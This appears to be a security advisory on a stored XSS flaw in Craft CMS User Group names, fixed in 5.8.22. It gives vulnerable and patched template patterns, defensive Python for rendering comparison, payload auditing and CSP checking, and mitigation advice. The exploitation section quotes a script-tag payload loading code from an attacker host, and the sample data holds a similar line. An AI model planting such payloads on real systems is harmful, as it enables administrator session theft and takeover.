Mar 12, 2026
A Stored XSS vulnerability in Craft CMS (< 5.8.22) allows attackers with User Group management privileges to inject malicious scripts via the User Group Name field. The script executes when an administrator views the User Permissions page.
Craft CMS versions prior to 5.8.22 contain a Stored Cross-Site Scripting (XSS) vulnerability in the Control Panel's User Permissions page. The application fails to properly HTML-encode User Group names, allowing an authenticated attacker with group management privileges to execute arbitrary JavaScript in the context of an administrator's session.
Craft CMS is a popular content management system that provides a robust Control Panel for administrative tasks. Within this Control Panel, the User Permissions page allows administrators to manage access control lists and assign privileges to various user groups. This vulnerability, identified as GHSA-G3HP-VVQF-8VW6, affects the rendering pipeline of this specific administrative interface.
The flaw manifests as a Stored Cross-Site Scripting (XSS) condition, tracked under CWE-79. It occurs because the application fails to properly neutralize user-supplied input when generating the web page. Specifically, the vulnerability is isolated to the display of User Group names within the permissions management view.
While the severity is officially classified as Low due to the required prerequisite privileges, the operational impact involves malicious script execution within an authenticated administrative context. An attacker must possess the ability to manage User Groups to exploit this vulnerability. The required interaction from a higher-privileged user makes this a targeted exploitation vector.
The root cause of this vulnerability lies in the improper handling of untrusted data retrieved from the database during the rendering of the Control Panel DOM. Craft CMS allows users with specific privileges to define custom names for User Groups. These names are stored persistently in the underlying database without strict input validation or sanitization.
When an administrator navigates to the User Permissions page, the application queries the database for all existing User Groups to populate the interface. The templating engine then processes these records to construct the HTML view. During this process, the name attribute of the User Group is injected directly into the document object model.
Because the system omits the necessary HTML-encoding step for this specific field, any HTML or JavaScript payloads embedded within the User Group name are treated as executable code by the browser. The browser cannot distinguish between the legitimate application structure and the injected malicious script. This failure to separate data from the execution context constitutes the core mechanism of the Stored XSS vulnerability.
The vulnerability stems from a common templating oversight where output encoding is explicitly bypassed or inadvertently omitted. In Craft CMS, control panel views are typically rendered using the Twig templating engine. By default, Twig automatically escapes variables, but a developer who assumes the data is safe can bypass that escaping with the raw filter.
Before the patch, the template responsible for rendering the User Permissions page output the group name dynamically without ensuring context-aware encoding. The official fix notes specify that the bug involved User Group names not being HTML-encoded. This indicates that the rendering logic treated the group name as raw HTML rather than a literal string.
```twig
{# Representative Vulnerable Code Pattern #}
<div class="user-group-item">
  <label>
    <input type="checkbox" name="groups[]" value="{{ group.id }}">
    {{ group.name | raw }} {# Vulnerable: Output rendered without encoding #}
  </label>
</div>
```

The remediation introduced in Craft CMS 5.8.22 enforces proper HTML-encoding for the User Group name prior to rendering. By removing explicit raw output filters or ensuring the variable is passed through standard encoding functions, the application guarantees that special characters are converted to their corresponding HTML entities.
```twig
{# Representative Patched Code Pattern #}
<div class="user-group-item">
  <label>
    <input type="checkbox" name="groups[]" value="{{ group.id }}">
    {{ group.name | escape('html') }} {# Patched: Output safely HTML-encoded #}
  </label>
</div>
```

Exploitation of GHSA-G3HP-VVQF-8VW6 requires a precise sequence of actions and specific preconditions. The attacker must first authenticate to the Craft CMS Control Panel using an account that holds privileges to create or modify User Groups. This initial access acts as the prerequisite for planting the malicious payload within the system.
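The two template patterns above differ only in whether the group name is encoded on output. The following Python script is an added illustration, not Craft's code: it mirrors both patterns with Python's stdlib html.escape (the same transformation Twig's escape('html') applies to an HTML text node), shows what the browser would receive for a planted name, and adds a post-upgrade audit that flags stored group names containing markup or handler syntax. The group records, their field names and the payload host are constructed sample data.

```python
import html
import re

# Constructed sample of User Group records (an assumed shape, not Craft's
# own data model); group 3 carries a planted payload of the kind described.
SAMPLE_GROUPS = [
    {"id": 1, "name": "Editors"},
    {"id": 2, "name": "Sales & Marketing"},
    {"id": 3, "name": '<script src="https://attacker.example/payload.js"></script>'},
    {"id": 4, "name": "Legacy <b>Team</b>"},
]


def render_group_row_vulnerable(group: dict) -> str:
    """Mirror of the pre-5.8.22 pattern: the name is dropped into the
    markup unchanged, so the browser parses any tags it contains."""
    return (
        '<div class="user-group-item"><label>'
        f'<input type="checkbox" name="groups[]" value="{int(group["id"])}">'
        f'{group["name"]}'
        "</label></div>"
    )


def render_group_row_patched(group: dict) -> str:
    """Mirror of the patched pattern. html.escape(quote=True) turns & < > " '
    into entities, so the name reaches the browser as text, never as markup."""
    return (
        '<div class="user-group-item"><label>'
        f'<input type="checkbox" name="groups[]" value="{int(group["id"])}">'
        f'{html.escape(group["name"], quote=True)}'
        "</label></div>"
    )


def renders_name_as_markup(rendered: str, name: str) -> bool:
    """True when a name containing '<' appears verbatim in the output,
    i.e. the browser would treat it as a tag rather than as text."""
    return "<" in name and name in rendered


# Anything that looks like a tag, an inline event handler attribute or a
# javascript: URL inside a group name deserves a manual look after upgrading.
_MARKUP_OR_HANDLER = re.compile(r"<\s*/?[a-z!]|\bon[a-z]+\s*=|javascript:", re.I)


def find_suspicious_group_names(groups) -> list:
    """Post-upgrade audit: ids of groups whose stored name contains markup
    or script-handler syntax. Encoding at render time stops execution, but
    a payload planted before the fix is still sitting in the database."""
    return [g["id"] for g in groups if _MARKUP_OR_HANDLER.search(g["name"])]


if __name__ == "__main__":
    for g in SAMPLE_GROUPS:
        print("vulnerable:", render_group_row_vulnerable(g))
        print("patched:   ", render_group_row_patched(g))
    print("review these group ids:", find_suspicious_group_names(SAMPLE_GROUPS))
```

The audit is a triage list, not a verdict: "Legacy <b>Team</b>" is flagged alongside the script tag because both contain markup, and a reviewer decides which is benign. In a real deployment the records would come from a query against the installation's user group table rather than the constructed list used here.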
Once authenticated, the attacker navigates to the User Groups management section and creates a new group or modifies an existing one. They input a malicious JavaScript payload, such as <script src="https://attacker.com/payload.js"></script>, into the User Group Name field. The application accepts this input and stores it persistently in the database.
The secondary phase of the attack relies on user interaction from a targeted administrator. The payload remains dormant until an administrator accesses the User Permissions page, typically while editing a user's account or reviewing system access controls. Upon loading the page, the administrator's browser executes the injected JavaScript within the context of their authenticated session.
The primary impact of this Stored XSS vulnerability is the compromise of the administrative session interacting with the poisoned User Permissions page. Because the injected script executes within the context of the victim's browser, it inherits all the privileges and session tokens associated with that user. This effectively bridges the gap between the attacker's lower privilege level and the victim's administrative access.
An attacker can leverage this execution to perform unauthorized actions silently in the background. The script can issue asynchronous HTTP requests to the Control Panel API, allowing the attacker to create new administrative accounts, alter system configurations, or modify existing content. These actions occur under the guise of the legitimate administrator, complicating forensic attribution.
Furthermore, the vulnerability enables targeted data exfiltration from the Control Panel. The malicious script can read sensitive information displayed on the page, access session identifiers stored in cookies or local storage, and transmit this data to an external server controlled by the attacker. While categorized as a Low severity issue due to the required prerequisites, the successful exploitation yields significant administrative compromise.
The vendor has addressed this vulnerability in the 5.x branch with the release of Craft CMS version 5.8.22. Organizations utilizing Craft CMS must upgrade their installations to this version or later to eliminate the risk. The patch resolves the issue by enforcing correct HTML-encoding on the User Group name during the rendering phase of the User Permissions page.
For environments where immediate patching is not feasible, administrators can implement localized mitigations. Restricting access to the User Groups management feature is a highly effective temporary measure. By auditing the current access control lists and revoking the group management permission from untrusted or lower-tier users, organizations can prevent the injection of new malicious payloads.
Additionally, deploying a strict Content Security Policy (CSP) header can mitigate the execution of unauthorized scripts. A well-configured CSP that prohibits unsafe-inline scripts and restricts external script sources will block the browser from executing the XSS payload, even if it is successfully rendered in the DOM. Security teams should monitor the Aliyun Vulnerability Database for any emerging weaponized exploits targeting this specific code path.
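Whether a CSP actually blocks this payload depends on the script-src list, not on 'unsafe-inline' alone: the example payload on this page is an external script element, so the policy must also refuse the attacker's host. The following Python script is an added example, not part of the advisory or of Craft CMS: it parses a Content-Security-Policy header, evaluates whether an inline script or a script from a given URL would run, and reports the weaknesses relevant to this bug. The two policies and the host names are constructed samples; port and path matching are omitted.

```python
from urllib.parse import urlsplit

# Two constructed policies for a control panel origin, used as sample input.
WEAK_CSP = "default-src 'self'; script-src 'self' 'unsafe-inline' https:"
STRICT_CSP = (
    "default-src 'self'; script-src 'self' 'nonce-r4nd0mNonce'; "
    "object-src 'none'; base-uri 'self'"
)


def parse_csp(header: str) -> dict:
    """Split a Content-Security-Policy value into {directive: [sources]}."""
    policy = {}
    for part in header.split(";"):
        tokens = part.split()
        if tokens:
            policy[tokens[0].lower()] = tokens[1:]
    return policy


def script_sources(policy: dict):
    """script-src governs <script>; when absent, browsers fall back to default-src."""
    return policy.get("script-src", policy.get("default-src"))


def _has_nonce_or_hash(srcs) -> bool:
    return any(s.lower().startswith(("'nonce-", "'sha256-", "'sha384-", "'sha512-")) for s in srcs)


def allows_inline_script(policy: dict) -> bool:
    """Would an inline <script> carrying no nonce or hash run under this policy?"""
    srcs = script_sources(policy)
    if srcs is None:
        return True           # nothing governs scripts: unrestricted
    if _has_nonce_or_hash(srcs):
        return False          # a nonce or hash makes browsers ignore 'unsafe-inline'
    return "'unsafe-inline'" in [s.lower() for s in srcs]


def allows_external_script(policy: dict, url: str, page_origin: str) -> bool:
    """Would <script src=url> on a page served from page_origin be fetched and run?
    Host, scheme, wildcard-subdomain and 'self' matching only (simplified)."""
    srcs = script_sources(policy)
    if srcs is None:
        return True
    low = [s.lower() for s in srcs]
    if low == ["'none'"]:
        return False
    u = urlsplit(url)
    for s in low:
        if s == "*":
            return True
        if s == "http:" or (s == "https:" and u.scheme == "https"):
            return True       # bare scheme source admits any host on that scheme
        if s == "'self'":
            if f"{u.scheme}://{u.netloc}" == page_origin.lower():
                return True
            continue
        if s.startswith("'"):
            continue          # keywords, nonces and hashes never match a host
        scheme, _, rest = s.partition("://")
        host = (rest if rest else scheme).split("/")[0].split(":")[0]
        if rest and scheme != u.scheme:
            continue
        if host.startswith("*.") and (u.hostname or "").endswith(host[1:]):
            return True
        if host == u.hostname:
            return True
    return False


def csp_findings(header: str) -> list:
    """Weaknesses that would let an injected inline script or a script from
    an attacker-controlled host run on the User Permissions page."""
    policy = parse_csp(header)
    srcs = script_sources(policy)
    if srcs is None:
        return ["no script-src or default-src: scripts are unrestricted"]
    findings = []
    if allows_inline_script(policy):
        findings.append("inline scripts allowed ('unsafe-inline' without nonce/hash)")
    if any(s.lower() in ("*", "http:", "https:") for s in srcs):
        findings.append("script-src admits any host via wildcard or bare scheme")
    return findings


if __name__ == "__main__":
    for label, header in (("weak", WEAK_CSP), ("strict", STRICT_CSP)):
        print(label, "->", csp_findings(header) or "no findings")
```

Note that 'self' still permits any script the site itself serves, so even the strict policy complements the encoding fix in 5.8.22 rather than replacing it.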
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

| Product | Affected Versions | Fixed Version |
|---|---|---|
| craftcms/cms (Craft CMS) | < 5.8.22 | 5.8.22 |

| Attribute | Detail |
|---|---|
| CWE ID | CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') |
| Attack Vector | Network |
| Privileges Required | Low (User Group Management) |
| User Interaction | Required |
| Exploit Status | PoC Available |
| CISA KEV | No |